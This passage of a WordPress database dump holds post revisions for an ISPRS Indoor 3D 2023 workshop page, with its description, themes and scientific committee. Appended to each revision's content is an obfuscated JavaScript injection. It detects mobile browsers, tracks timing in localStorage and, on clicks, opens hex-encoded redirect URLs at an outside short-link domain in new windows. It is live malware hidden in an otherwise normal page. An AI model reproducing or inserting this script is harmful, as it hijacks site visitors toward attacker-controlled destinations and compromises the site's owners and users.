_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:56:14','2022-10-07 21:56:14','',2586,'https://gsw2023.com/?p=2611',0,'revision','',0),
(2612,1,'2022-10-07 21:57:45','2022-10-07 21:57:45','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:57:45','2022-10-07 21:57:45','',2586,'https://gsw2023.com/?p=2612',0,'revision','',0),
(2613,1,'2022-10-07 21:59:32','2022-10-07 21:59:32','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" 